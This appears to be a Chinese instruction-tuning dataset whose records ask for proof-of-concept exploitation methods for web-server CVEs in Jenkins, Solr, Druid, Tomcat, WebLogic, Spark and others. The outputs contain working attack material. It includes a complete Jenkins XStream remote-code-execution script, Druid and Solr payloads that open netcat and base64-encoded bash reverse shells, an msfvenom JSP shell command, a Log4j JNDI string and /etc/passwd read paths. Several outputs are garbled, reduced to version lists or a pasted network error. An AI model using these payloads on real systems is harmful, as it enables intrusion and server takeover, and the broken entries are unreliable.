  1012. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:Zabbix SAML身份绕过漏洞 CVE-2022-23131\n漏洞描述:Zabbix 是一个基于WEB界面的提供分布式系统监视以及网络监视功能的企业级的开源解决方案。 Zabbix 由两部分构成,Zabbix Server与可选组件 Zabbix Agent。Zabbix Server 可以通过 SNMP、Zabbix Agent、Ping、端口监视等方法提供对远程服务器/网络状态的监视、数据收集等功能,它可以运行在 Linux、Solaris、HP-UX、AIX、Free BSD、Open BSD、OS X等平台上。 在启用 SAML SSO 身份验证(非默认)的情况下,未经身份验证的攻击者可以通过修改Cookie数据,绕过身份认证获得对 Zabbix 前端的管理员访问权限。\n影响版本:``` Zabbix 4.0.36 Zabbix 5.4.0 Zabbix 5.4.8 Zabbix 6.0.0alpha1 ```\n网络测绘:``` app=\"ZABBIX-监控系统\" && body=\"saml\" ``` ``` title:\"ZABBIX\" ``` ``` title=\"ZABBIX\" ```\n", "input": "", "output": "【漏洞类型】web_server_vulnerability\n【CVE编号】CVE-2022-23131\n【POC利用方法】\n1. Zabbix 4.0.36\nZabbix 5.4.0\nZabbix 5.4.8\nZabbix 6.0.0alpha1\n2. app=\"ZABBIX-监控系统\" && body=\"saml\"\n3. title:\"ZABBIX\"\n", "category": "poc_web_server_vulnerability", "source": "awesome_poc_dataset", "file_path": "Web服务器漏洞/Zabbix SAML身份绕过漏洞 CVE-2022-23131.md"}
    1013. 

  1013. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:WebLogic Local File Inclusion 本地文件包含漏洞 CVE-2022-21371\n漏洞描述:2022年1月19日,绿盟科技CERT监测发现Oracle官方发布了1月关键补丁更新公告CPU(Critical Patch Update),此次共修复了497个不同程度的漏洞,此次安全更新涉及Oracle WebLogic Server、Oracle MySQL、Oracle Java SE、Oracle FusionMiddleware、Oracle Retail Applications等多个常用产品。Oracle强烈建议客户尽快应用关键补丁更新修复程序,对漏洞进行修复。\n影响版本:``` WebLogic Server 12.1.3.0.0, 12.2.1.3.0, 12.2.1.4.0 and 14.1.1.0.0 ```\n", "input": "", "output": "【漏洞类型】web_server_vulnerability\n【CVE编号】CVE-2022-21371\n【POC利用方法】\n1. WebLogic Server 12.1.3.0.0, 12.2.1.3.0, 12.2.1.4.0 and 14.1.1.0.0\n2. .//META-INF/MANIFEST.MF\n.//WEB-INF/web.xml\n.//WEB-INF/portlet.xml\n.//WEB-INF/weblogic.xml\n", "category": "poc_web_server_vulnerability", "source": "awesome_poc_dataset", "file_path": "Web服务器漏洞/WebLogic Local File Inclusion 本地文件包含漏洞 CVE-2022-21371.md"}
    1014. 

  1014. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:muhttpd 任意文件读取漏洞 CVE-2022-31793\n漏洞描述:muhttpd(mu-HTTP-deamon)是一个简单但完整的web服务器,用可移植的ANSI C编写。它支持静态页面、CGI脚本、基于MIME类型的处理程序和HTTPS。它在接受任何连接之前放弃特权,并且可以记录接收到的请求。它已经在GNU/Linux、NetBSD、FreeBSD、Mac OS X和Cygwin上进行了测试。它在32位和64位、小端和大端系统上成功运行。 muhttpd 1.1.7之前版本存在安全漏洞。攻击者利用该漏洞读取系统任意文件。\n影响版本:``` muhttpd 1.1.7 ```\n网络测绘:``` \"2017 ARRIS Enterprises,\" ```\n", "input": "", "output": "【漏洞类型】web_server_vulnerability\n【CVE编号】CVE-2022-31793\n【POC利用方法】\n1. muhttpd 1.1.7\n2. \"2017 ARRIS Enterprises,\"\n3. a/etc/passwd\n", "category": "poc_web_server_vulnerability", "source": "awesome_poc_dataset", "file_path": "Web服务器漏洞/muhttpd 任意文件读取漏洞 CVE-2022-31793.md"}
    1015. 

  1015. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:Apache Tomcat WebSocket 拒绝服务漏洞 CVE-2020-13935\n漏洞描述:2020年11月06日,360CERT监测发现`@RedTeamPentesting`发布了`Tomcat WebSokcet 拒绝服务漏洞` 的分析报告该漏洞编号为 `CVE-2020-13935` ,漏洞等级:`高危` ,漏洞评分:`7.5` 。 未授权的远程攻击者通过发送 `大量特制请求包` 到Tomcat服务器 ,可造成服务器停止响应并无法提供正常服务\n影响版本:``` Apache Tomcat 10.0.0-M1-10.0.0-M6 Apache Tomcat 9.0.0.M1-9.0.36 Apache Tomcat 8.5.0-8.5.56 Apache Tomcat 7.0.27-7.0.104 ```\n", "input": "", "output": "【漏洞类型】web_server_vulnerability\n【CVE编号】CVE-2020-13935\n【POC利用方法】\n1. Apache Tomcat 10.0.0-M1-10.0.0-M6\nApache Tomcat 9.0.0.M1-9.0.36\nApache Tomcat 8.5.0-8.5.56\nApache Tomcat 7.0.27-7.0.104\n2. https://github.com/vulhub/vulhub.git\ncd vulhub/tomcat/CVE-2020-1938\ndocker-compose up -d\n3. go: github.com/gorilla/websocket@v1.4.2: Get \"https://proxy.golang.org/github.com/gorilla/websocket/@v/v1.4.2.mod\": dial tcp 172.217.160.81:443: connectex: A connection attempt failed because the connected party did not properly respond after a period of time, or established connection failed because connected host has failed to respond.\n", "category": "poc_web_server_vulnerability", "source": "awesome_poc_dataset", "file_path": "Web服务器漏洞/Apache Tomcat WebSocket 拒绝服务漏洞 CVE-2020-13935.md"}
    1016. 

  1016. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:Jenkins XStream 反序列化漏洞 CVE-2016-0792\n漏洞描述:国外网站`Contrast Security`于2016年2月24日在公开了Jenkins近日修复的一个可通过低权限用户调用API服务致使的命令执行漏洞详情。通过低权限用户构造一个恶意的XML文档发送至服务端接口,使服务端解析时调用API执行外部命令。\n影响版本:``` jenkins版本小于1.650(1.650版本已修复该问题) ```\n", "input": "", "output": "【漏洞类型】web_server_vulnerability\n【CVE编号】CVE-2016-0792\n【POC利用方法】\n1. jenkins版本小于1.650(1.650版本已修复该问题)\n2. #! /usr/bin/env python2\n\n#Jenkins Groovy XML RCE (CVE-2016-0792)\n#Note: Although this is listed as a pre-auth RCE, during my testing it only worked if authentication was disabled in Jenkins\n#Made with <3 by @byt3bl33d3r\n\nfrom __future__ import print_function\nimport requests\nfrom requests.packages.urllib3.exceptions import InsecureRequestWarning\nrequests.packages.urllib3.disable_warnings(InsecureRequestWarning)\n\nimport argparse\nimport sys\n\nparser = argparse.ArgumentParser()\nparser.add_argument('target', type=str, help='Target IP:PORT')\nparser.add_argument('command', type=str, help='Command to run on target')\nparser.add_argument('--proto', choices={'http', 'https'}, default='http', help='Send exploit over http or https (default: http)')\n\nif len(sys.argv) < 2:\n    parser.print_help()\n    sys.exit(1)\n\nargs = parser.parse_args()\n\nif len(args.target.split(':')) != 2:\n    print('[-] Target must be in format IP:PORT')\n    sys.exit(1)\n\nif not args.command:\n    print('[-] You must specify a command to run')\n    sys.exit(1)\n\nip, port = args.target.split(':')\n\nprint('[*] Target IP: {}'.format(ip))\nprint('[*] Target PORT: {}'.format(port))\n\nxml_formatted = ''\ncommand_list = args.command.split()\nfor cmd in command_list:\n    xml_formatted += '{:>16}<string>{}</string>\\n'.format('', cmd)\n\nxml_payload = '''<map>\n  <entry>\n    <groovy.util.Expando>\n      <expandoProperties>\n        <entry>\n          <string>hashCode</string>\n          <org.codehaus.groovy.runtime.MethodClosure>\n            <delegate class=\"groovy.util.Expando\" reference=\"../../../..\"/>\n            <owner class=\"java.lang.ProcessBuilder\">\n              <command>\n                {}\n              </command>\n              <redirectErrorStream>false</redirectErrorStream>\n            </owner>\n            <resolveStrategy>0</resolveStrategy>\n            <directive>0</directive>\n            <parameterTypes/>\n            <maximumNumberOfParameters>0</maximumNumberOfParameters>\n            <method>start</method>\n          </org.codehaus.groovy.runtime.MethodClosure>\n        </entry>\n      </expandoProperties>\n    </groovy.util.Expando>\n   <int>1</int>\n </entry>\n</map>'''.format(xml_formatted.strip())\n\nprint('[*] Generated XML payload:')\nprint(xml_payload)\nprint() \n\nprint('[*] Sending payload')\nheaders = {'Content-Type': 'text/xml'}\nr = requests.post('{}://{}:{}/createItem?name=rand_dir'.format(args.proto, ip, port), verify=False, headers=headers, data=xml_payload)\n\npaths_in_trace = ['jobs/rand_dir/config.xml', 'jobs\\\\rand_dir\\\\config.xml']\nif r.status_code == 500:\n    for path in paths_in_trace:\n        if path in r.text:\n            print('[+] Command executed successfully')\n            break\n3. parser.add_argument('target', type=str, help='Target IP:PORT')\n", "category": "poc_web_server_vulnerability", "source": "awesome_poc_dataset", "file_path": "Web服务器漏洞/Jenkins XStream 反序列化漏洞 CVE-2016-0792.md"}
    1017. 

  1017. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:Apache ActiveMQ Console控制台默认弱口令\n漏洞描述:Apache ActiveMQ Console 存在默认弱口令 admin:admin,进入控制台后可被进一步恶意利用\n影响版本:``` Apache ActiveMQ ```\n", "input": "", "output": "【漏洞类型】web_server_vulnerability\n【POC利用方法】\n1. Apache ActiveMQ\n2. 访问目标: http://xxx.xxx.xxx.xxx:8161/admin\n", "category": "poc_web_server_vulnerability", "source": "awesome_poc_dataset", "file_path": "Web服务器漏洞/Apache ActiveMQ Console控制台默认弱口令.md"}
    1018. 

  1018. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:Apache Solr Replication handler SSRF CVE-2021-27905\n漏洞描述:Apache Solr是一个开源搜索服务引擎,Solr 使用 Java 语言开发,主要基于 HTTP 和 Apache Lucene 实现。漏洞产生在 ReplicationHandler 中的 masterUrl 参数( leaderUrl 参数)可指派另一个 Solr 核心上的 ReplicationHandler 讲索引数据复制到本地核心上。成功利用此漏洞可造成服务端请求伪造漏洞。 参考链接: * https://nvd.nist.gov/vuln/detail/CVE-2021-27905\n影响版本:``` Apache Solr 7.0.0 - 7.7.3 Apache Solr 8.0.0 - 8.8.1 ``` poc: ``` GET /solr/test/replication?command=fetchindex&masterUrl=http://127.0.0.1/&wt=json&httpBasicAuthUser=&httpBasicAuthPassword= HTTP/1.1 HOST:target .... ``` ``` GET http://xxxxx/solr/xxxx/debug/dump?stream.url=file:///etc/passwd&param=ContentStream HTTP/1.1 HOST:target ... ```\n", "input": "", "output": "【漏洞类型】web_server_vulnerability\n【CVE编号】CVE-2021-27905\n【POC利用方法】\n1. Apache Solr 7.0.0 - 7.7.3 \nApache Solr 8.0.0 - 8.8.1\n2. GET /solr/test/replication?command=fetchindex&masterUrl=http://127.0.0.1/&wt=json&httpBasicAuthUser=&httpBasicAuthPassword= HTTP/1.1\nHOST:target\n....\n3. GET http://xxxxx/solr/xxxx/debug/dump?stream.url=file:///etc/passwd&param=ContentStream HTTP/1.1\nHOST:target\n...\n", "category": "poc_web_server_vulnerability", "source": "awesome_poc_dataset", "file_path": "Web服务器漏洞/Apache Solr Replication handler SSRF CVE-2021-27905.md"}
    1019. 

  1019. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:Apache Spark doAs 远程命令执行漏洞 CVE-2022-33891\n漏洞描述:Apache Spark 支持启动 ACL 来为 Web UI 访问提供身份验证,当 ACL 启动时可以通过构造特殊请求用户名导致 RCE\n影响版本:``` Spark Core - Apache <=3.0.3 3.1.1 <= Spark Core - Apache <=3.1.2 3.2.0 <= Spark Core - Apache <=3.2.1 ```\n网络测绘:``` app=\"APACHE-Spark\" ```\n", "input": "", "output": "【漏洞类型】web_server_vulnerability\n【CVE编号】CVE-2022-33891\n【POC利用方法】\n1. Spark Core - Apache <=3.0.3\n3.1.1 <= Spark Core - Apache <=3.1.2\n3.2.0 <= Spark Core - Apache <=3.2.1\n2. app=\"APACHE-Spark\"\n3. /jobs/?doAs=`touch /tmp/test.txt`\n", "category": "poc_web_server_vulnerability", "source": "awesome_poc_dataset", "file_path": "Web服务器漏洞/Apache Spark doAs 远程命令执行漏洞 CVE-2022-33891.md"}
    1020. 

  1020. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:Apache Tomcat 远程代码执行漏洞 CVE-2017-12615\n漏洞描述:2017年9月19日,Apache Tomcat官方确认并修复了两个高危漏洞,其中就有远程代码执行漏洞(CVE-2017-12615)。当 启用了HTTP PUT请求方法(例如,将 readonly 初始化参数由默认值设置为 false),攻击者将有可能可通过精心构造的攻击请求数据包向服务器上传包含任意代码的 JSP 文件,JSP文件中的恶意代码将能被服务器执行。导致服务器上的数据泄露或获取服务器权限。\n影响版本:``` Apache Tomcat 7.0.0 - 7.0.81 ```\n", "input": "", "output": "【漏洞类型】web_server_vulnerability\n【CVE编号】CVE-2017-12615\n【POC利用方法】\n1. Apache Tomcat 7.0.0 - 7.0.81\n2. https://github.com/vulhub/vulhub.git\ncd vulhub/tomcat/CVE-2017-12615\ndocker-compose up -d\n3. msfvenom -p java/jsp_shell_reverse_tcp LHOST=xxx.xxx.xxx.xxx LPORT=9999 -f raw > shell.jsp\n", "category": "poc_web_server_vulnerability", "source": "awesome_poc_dataset", "file_path": "Web服务器漏洞/Apache Tomcat 远程代码执行漏洞 CVE-2017-12615.md"}
    1021. 

  1021. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:PayaraMicro microprofile-config.properties 信息泄漏漏洞 CVE-2021-41381\n漏洞描述:PayaraMicro microprofile-config.properties文件配置错误的情况下可被任意用户读取,获取敏感信息\n影响版本:``` Payara Micro Community 5.2021.6 ```\n网络测绘:``` app=\"Payara-Micro\" ```\n", "input": "", "output": "【漏洞类型】web_server_vulnerability\n【CVE编号】CVE-2021-41381\n【POC利用方法】\n1. Payara Micro Community 5.2021.6\n2. app=\"Payara-Micro\"\n3. /.//WEB-INF/classes/META-INF/microprofile-config.properties\n", "category": "poc_web_server_vulnerability", "source": "awesome_poc_dataset", "file_path": "Web服务器漏洞/PayaraMicro microprofile-config.properties 信息泄漏漏洞 CVE-2021-41381.md"}
    1022. 

  1022. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:Apache OFBiz RMI反序列化漏洞 CVE-2021-26295\n漏洞描述:OFBiz是基于Java的Web框架,包括实体引擎,服务引擎和基于小部件的UI。 近日,Apache OFBiz官方发布安全更新。Apache OFBiz 存在RMI反序列化前台命令执行,未经身份验证的攻击者可以使用此漏洞来成功接管Apache OFBiz,建议相关用户尽快测试漏洞修复的版本并及时升级。\n影响版本:``` Apache OFBiz < 17.12.06 ```\n网络测绘:``` app=\"Apache_OFBiz\" ```\n", "input": "", "output": "【漏洞类型】web_server_vulnerability\n【CVE编号】CVE-2021-26295\n【POC利用方法】\n1. Apache OFBiz < 17.12.06\n2. app=\"Apache_OFBiz\"\n3. docker run -d -p 8000:8080 -p 8443:8443  opensourceknight/ofbiz\n", "category": "poc_web_server_vulnerability", "source": "awesome_poc_dataset", "file_path": "Web服务器漏洞/Apache OFBiz RMI反序列化漏洞 CVE-2021-26295.md"}
    1023. 

  1023. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:Apache Flink 目录遍历漏洞 CVE-2020-17519\n漏洞描述:2021年01月06日,360CERT监测发现`Apache Flink`发布了`Apache Flink 目录穿越漏洞,目录穿越漏洞`的风险通告,漏洞编号为`CVE-2020-17518,CVE-2020-17519`,漏洞等级:`高危`,漏洞评分:`8.5`。 远程攻击者通过`REST API`目录遍历,可造成`文件读取/写入`的影响。\n影响版本:``` Apache Flink 1.11.0 Apache Flink 1.11.1 Apache Flink 1.11.2 ```\n网络测绘:``` app=\"Apache Flink\" ```\n", "input": "", "output": "【漏洞类型】web_server_vulnerability\n【CVE编号】CVE-2020-17519\n【POC利用方法】\n1. Apache Flink 1.11.0\nApache Flink 1.11.1\nApache Flink 1.11.2\n2. app=\"Apache Flink\"\n3. https://github.com/vulhub/vulhub/tree/master/flink/CVE-2020-17519\n", "category": "poc_web_server_vulnerability", "source": "awesome_poc_dataset", "file_path": "Web服务器漏洞/Apache Flink 目录遍历漏洞 CVE-2020-17519.md"}
    1024. 

  1024. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:Apache Druid 远程代码执行漏洞 CVE-2021-25646\n漏洞描述:Apache Druid 是用Java编写的面向列的开源分布式数据存储,旨在快速获取大量事件数据,并在数据之上提供低延迟查询。 Apache Druid 默认情况下缺乏授权认证,攻击者可以发送特制请求,利用Druid服务器上进程的特权执行任意代码。 Apache Druid包括执行用户提供的JavaScript的功能嵌入在各种类型请求中的代码。此功能在用于高信任度环境中,默认已被禁用。但是,在Druid 0.20.0及更低版本中,经过身份验证的用户发送恶意请求,利用Apache Druid漏洞可以执行任意代码。 参考链接: * https://github.com/apache/druid/issues/2434 * https://forum.ywhack.com/thread-115083-1-1.html * https://druid.apache.org/docs/latest/operations/api-reference.html#broker * https://lists.apache.org/thread.html/r20e0c3b10ae2c05a3aad40f1476713c45bdefc32c920b9986b941d8f@%3Cannounce.apache.org%3E * https://www.o2oxy.cn/3090.html\n影响版本:``` Apache Druid < 0.20.1 ```\n", "input": "", "output": "【漏洞类型】web_server_vulnerability\n【CVE编号】CVE-2021-25646\n【POC利用方法】\n1. Apache Druid < 0.20.1\n2. POST /druid/indexer/v1/sampler HTTP/1.1\nHost: xxx.xxx.xxx.xxx:8888\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.16; rv:85.0) Gecko/20100101 Firefox/85.0\nAccept: application/json, text/plain, */*\nAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2\nContent-Type: application/json\nContent-Length: 995\nConnection: close\n\n\n{\"type\": \"index\", \"spec\": {\"ioConfig\": {\"type\": \"index\", \"inputSource\": {\"type\": \"inline\", \"data\": \"{\\\"isRobot\\\":true,\\\"channel\\\":\\\"#x\\\",\\\"timestamp\\\":\\\"2021-2-1T14:12:24.050Z\\\",\\\"flags\\\":\\\"x\\\",\\\"isUnpatrolled\\\":false,\\\"page\\\":\\\"1\\\",\\\"diffUrl\\\":\\\"https://xxx.com\\\",\\\"added\\\":1,\\\"comment\\\":\\\"Botskapande Indonesien omdirigering\\\",\\\"commentLength\\\":35,\\\"isNew\\\":true,\\\"isMinor\\\":false,\\\"delta\\\":31,\\\"isAnonymous\\\":true,\\\"user\\\":\\\"Lsjbot\\\",\\\"deltaBucket\\\":0,\\\"deleted\\\":0,\\\"namespace\\\":\\\"Main\\\"}\"}, \"inputFormat\": {\"type\": \"json\", \"keepNullColumns\": true}}, \"dataSchema\": {\"dataSource\": \"sample\", \"timestampSpec\": {\"column\": \"timestamp\", \"format\": \"iso\"}, \"dimensionsSpec\": {}, \"transformSpec\": {\"transforms\": [], \"filter\": {\"type\": \"javascript\", \"dimension\": \"added\", \"function\": \"function(value) {java.lang.Runtime.getRuntime().exec('ping xxxxx.dnslog.cn')}\", \"\": {\"enabled\": true}}}}, \"type\": \"index\", \"tuningConfig\": {\"type\": \"index\"}}, \"samplerConfig\": {\"numRows\": 500, \"timeoutMs\": 15000}}\n3. POST /druid/indexer/v1/sampler HTTP/1.1\nHost: xxx.xxx.xxx.xxx:8888\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.16; rv:85.0) Gecko/20100101 Firefox/85.0\nAccept: application/json, text/plain, */*\nAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2\nContent-Type: application/json\nContent-Length: 1008\nConnection: close\n\n\n{\"type\": \"index\", \"spec\": {\"ioConfig\": {\"type\": \"index\", \"inputSource\": {\"type\": \"inline\", \"data\": \"{\\\"isRobot\\\":true,\\\"channel\\\":\\\"#x\\\",\\\"timestamp\\\":\\\"2021-2-1T14:12:24.050Z\\\",\\\"flags\\\":\\\"x\\\",\\\"isUnpatrolled\\\":false,\\\"page\\\":\\\"1\\\",\\\"diffUrl\\\":\\\"https://xxx.com\\\",\\\"added\\\":1,\\\"comment\\\":\\\"Botskapande Indonesien omdirigering\\\",\\\"commentLength\\\":35,\\\"isNew\\\":true,\\\"isMinor\\\":false,\\\"delta\\\":31,\\\"isAnonymous\\\":true,\\\"user\\\":\\\"Lsjbot\\\",\\\"deltaBucket\\\":0,\\\"deleted\\\":0,\\\"namespace\\\":\\\"Main\\\"}\"}, \"inputFormat\": {\"type\": \"json\", \"keepNullColumns\": true}}, \"dataSchema\": {\"dataSource\": \"sample\", \"timestampSpec\": {\"column\": \"timestamp\", \"format\": \"iso\"}, \"dimensionsSpec\": {}, \"transformSpec\": {\"transforms\": [], \"filter\": {\"type\": \"javascript\", \"dimension\": \"added\", \"function\": \"function(value) {java.lang.Runtime.getRuntime().exec(' nc xxx.xxx.xxx.xxx 9999 -e /bin/sh')}\", \"\": {\"enabled\": true}}}}, \"type\": \"index\", \"tuningConfig\": {\"type\": \"index\"}}, \"samplerConfig\": {\"numRows\": 500, \"timeoutMs\": 15000}}\n", "category": "poc_web_server_vulnerability", "source": "awesome_poc_dataset", "file_path": "Web服务器漏洞/Apache Druid 远程代码执行漏洞 CVE-2021-25646.md"}
    1025. 

  1025. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:Apache Solr 远程执行漏洞 CVE-2019-0193\n漏洞描述:2019 年 08 月 01 日,Apache Solr 官方发布预警,Apache Solr DataImport 功能 在开启 Debug 模式时,可以接收来自请求的”dataConfig”参数,这个参数的功能与`data-config.xml` 一样,不过是在开启 Debug 模式时方便通过此参数进行调试,并且 Debug 模式的开启是通过参数传入的。在 `dataConfig` 参数中可以包含 script 恶意脚本导致远程代码执行。\n影响版本:``` Apache Solr < 8.2.0 ```\n", "input": "", "output": "【漏洞类型】web_server_vulnerability\n【CVE编号】CVE-2019-0193\n【POC利用方法】\n1. Apache Solr < 8.2.0\n2. https://github.com/vulhub/vulhub.git\ncd vulhub/solr/CVE-2019-0193\ndocker-compose build\ndocker-compose up -d\n\n# 创建一个solr核心test\ndocker-compose exec solr bash bin/solr create_core -c test -d example/example-DIH/solr/db\n3. <dataConfig>\n  <dataSource type=\"URLDataSource\"/>\n  <script><![CDATA[\n          function poc(){ java.lang.Runtime.getRuntime().exec(\"bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC94eHgueHh4Lnh4eC54eHgvOTk5OSAwPiYx}|{base64,-d}|{bash,-i}\");\n          }\n  ]]></script>\n  <document>\n    <entity name=\"stackoverflow\"\n            url=\"https://stackoverflow.com/feeds/tag/solr\"\n            processor=\"XPathEntityProcessor\"\n            forEach=\"/feed\"\n            transformer=\"script:poc\" />\n  </document>\n</dataConfig>\n", "category": "poc_web_server_vulnerability", "source": "awesome_poc_dataset", "file_path": "Web服务器漏洞/Apache Solr 远程执行漏洞 CVE-2019-0193.md"}
    1026. 

  1026. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:Apache Solr Log4j组件 远程命令执行漏洞\n漏洞描述:Apache Solr Log4j组件 远程命令执行漏洞,详情略\n影响版本:``` Apache Solr ```\n网络测绘:``` app=\"APACHE-Solr\" ```\n", "input": "", "output": "【漏洞类型】web_server_vulnerability\n【POC利用方法】\n1. Apache Solr\n2. app=\"APACHE-Solr\"\n3. /solr/admin/collections?action=${jndi:ldap://xxx/Basic/ReverseShell/ip/87}&wt=json\n", "category": "poc_web_server_vulnerability", "source": "awesome_poc_dataset", "file_path": "Web服务器漏洞/Apache Solr Log4j组件 远程命令执行漏洞.md"}
    1027. 

  1027. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:Jenkins checkScript 远程命令执行漏洞 CVE-2018-1000861\n漏洞描述:Jenkins使用Stapler框架开发,其允许用户通过URL PATH来调用一次public方法。由于这个过程没有做限制,攻击者可以构造一些特殊的PATH来执行一些敏感的Java方法。 通过这个漏洞,我们可以找到很多可供利用的利用链。其中最严重的就是绕过Groovy沙盒导致未授权用户可执行任意命令:Jenkins在沙盒中执行Groovy前会先检查脚本是否有错误,检查操作是没有沙盒的,攻击者可以通过Meta-Programming的方式,在检查这个步骤时执行任意命令。\n影响版本:``` Jenkins version < 2.138 Jenkins build time < 2019-01-28 ```\n网络测绘:``` app=\"Jenkins\" ```\n", "input": "", "output": "【漏洞类型】web_server_vulnerability\n【CVE编号】CVE-2018-1000861\n【POC利用方法】\n1. Jenkins version < 2.138\nJenkins build time < 2019-01-28\n2. app=\"Jenkins\"\n3. http://your-ip:8080/securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.scriptsecurity.sandbox.groovy.SecureGroovyScript/checkScript\n?sandbox=true\n&value=public class x {\n  public x(){\n    \"touch /tmp/success\".execute()\n  }\n", "category": "poc_web_server_vulnerability", "source": "awesome_poc_dataset", "file_path": "Web服务器漏洞/Jenkins checkScript 远程命令执行漏洞 CVE-2018-1000861.md"}
    1028. 

  1028. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:Weblogic LDAP 远程代码执行漏洞 CVE-2021-2109\n漏洞描述:2021年1月20日,绿盟科技监测发现Oracle官方发布了2021年1月关键补丁更新公告CPU(Critical Patch Update),共修复了329个不同程度的漏洞,其中包括7个影响WebLogic的严重漏洞(CVE-2021-1994、CVE-2021-2047、CVE-2021-2064、CVE-2021-2108、CVE-2021-2075、CVE-2019-17195、CVE-2020-14756),未经身份验证的攻击者可通过此次的漏洞实现远程代码执行。CVSS评分均为9.8,利用复杂度低。建议用户尽快采取措施,对上述漏洞进行防护。\n影响版本:``` WebLogic Server 10.3.6.0.0 WebLogic Server 12.1.3.0.0 WebLogic Server 12.2.1.3.0 WebLogic Server 12.2.1.4.0 WebLogic Server 14.1.1.0.0 ```\n", "input": "", "output": "【漏洞类型】web_server_vulnerability\n【CVE编号】CVE-2021-2109\n【POC利用方法】\n1. WebLogic Server 10.3.6.0.0\nWebLogic Server 12.1.3.0.0\nWebLogic Server 12.2.1.3.0\nWebLogic Server 12.2.1.4.0\nWebLogic Server 14.1.1.0.0\n2. git clone https://github.com/vulhub/vulhub.git\ncd vulhub/weblogic/CVE-2020-14882\ndocker-compose up -d\n3. java -jar JNDIExploit-v1.11.jar -i xxx.xxx.xxx.xxx (服务器地址)\n", "category": "poc_web_server_vulnerability", "source": "awesome_poc_dataset", "file_path": "Web服务器漏洞/Weblogic LDAP 远程代码执行漏洞 CVE-2021-2109.md"}
    1029. 

  1029. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:Apache Kylin config 未授权配置泄露 CVE-2020-13937\n漏洞描述:Apache Kylin有一个restful api会在没有任何认证的情况下暴露配置信息\n网络测绘:``` app=\"APACHE-kylin\" ```\n", "input": "", "output": "【漏洞类型】web_server_vulnerability\n【CVE编号】CVE-2020-13937\n【POC利用方法】\n1. app=\"APACHE-kylin\"\n2. docker pull apachekylin/apache-kylin-standalone:3.0.1\n\ndocker run -d \\\n-m 8G \\\n-p 7070:7070 \\\n-p 8088:8088 \\\n-p 50070:50070 \\\n-p 8032:8032 \\\n-p 8042:8042 \\\n-p 16010:16010 \\\napachekylin/apache-kylin-standalone:3.0.1\n3. /kylin/api/admin/config\n", "category": "poc_web_server_vulnerability", "source": "awesome_poc_dataset", "file_path": "Web服务器漏洞/Apache Kylin config 未授权配置泄露 CVE-2020-13937.md"}
    1030. 

  1030. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:Apache Kylin CubeService.java 命令注入漏洞 CVE-2020-1956\n漏洞描述:2020年5月22日,CNVD通报了 Apache Kylin存在命令注入漏洞 CVE-2020-1956 Apache Kylin 是美国 Apache软件基金会的一款开源的分布式分析型数据仓库。该产品主要提供 Hadoop/Spark之上的 SQL查询接口及多维分析(OLAP)等功能。\n影响版本:``` Apache Kylin 2.3.0 ~ 2.3.2 Apache Kylin 2.4.0 ~ 2.4.1 Apache Kylin 2.5.0 ~ 2.5.2 Apache Kylin 2.6.0 ~ 2.6.5 Apache Kylin 3.0.0-alpha ```\n", "input": "", "output": "【漏洞类型】web_server_vulnerability\n【CVE编号】CVE-2020-1956\n【POC利用方法】\n1. Apache Kylin 2.3.0 ~ 2.3.2\nApache Kylin 2.4.0 ~ 2.4.1\nApache Kylin 2.5.0 ~ 2.5.2\nApache Kylin 2.6.0 ~ 2.6.5\nApache Kylin 3.0.0-alpha\n2. docker pull apachekylin/apache-kylin-standalone:3.0.1\n\ndocker run -d \\\n-m 8G \\\n-p 7070:7070 \\\n-p 8088:8088 \\\n-p 50070:50070 \\\n-p 8032:8032 \\\n-p 8042:8042 \\\n-p 16010:16010 \\\napachekylin/apache-kylin-standalone:3.0.1\n3. POST /kylin/api/cubes/{cube}/{project}/migrate\n", "category": "poc_web_server_vulnerability", "source": "awesome_poc_dataset", "file_path": "Web服务器漏洞/Apache Kylin CubeService.java 命令注入漏洞 CVE-2020-1956.md"}
    1031. 

